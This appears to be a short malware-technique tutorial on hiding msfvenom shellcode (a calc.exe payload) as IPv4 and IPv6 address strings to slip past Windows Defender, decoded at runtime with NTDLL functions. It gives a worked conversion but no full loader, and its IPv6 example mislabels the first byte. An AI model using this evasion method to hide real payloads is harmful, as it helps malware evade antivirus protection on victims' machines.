This is a technique where the data / the critical part of the malware is converted to IPv4 or IPv6 strings. So during execution this part is again converted back and executed.
For an example , we are taking a msfvenom shellcode payload which can spawn calc.exe upon execution.
As soon we compile the malware with obtained shellcode from msfvenom we see defender shouting it as malware.
So the idea here is to convert all of the shellcode bytes to decimals and group them to look like IP’s. In IPv4 obfuscation , we see that 4 bytes of data form a IP.For example “FC 48 83 E4” ( bytes from below image). Upon meticulous conversion, FC assumes a decimal value of 252, 48 manifests as 72, 83 emerges as 131, and E4 culminates in 228. Consequently, the initial four bytes of the specified shellcode “FC 48 83 E4” is transformed into the IPv4 address 252.72.131[.]228 .
After obfuscating the shell-code as IP’s we are able to evade defender and run the program.
Similar to its IPv4 counterpart, IPv6 obfuscation leverages a strategic approach to transform its underlying structure into a seemingly innocuous form. However, a subtle adjustment arises due to the difference in address length — IPv6 utilizes 16 bytes compared to IPv4’s 4 bytes. Importantly, the conversion to decimal values, necessary for IPv4 obfuscation, becomes redundant for IPv6 addresses as hexa-decimals can be directly included. For example the initial bytes of the sample show above would be obfuscated as
“FF48:83E4:F0E8:C000:0000:4151:4150:5251”
Deobfuscating the obfuscated IP strings can be done using NTDLL API functions “RtlIpv4StringToAddressA” for IPv4 and using “RtlIpv6StringToAddressA” for IPv6 obfuscated string.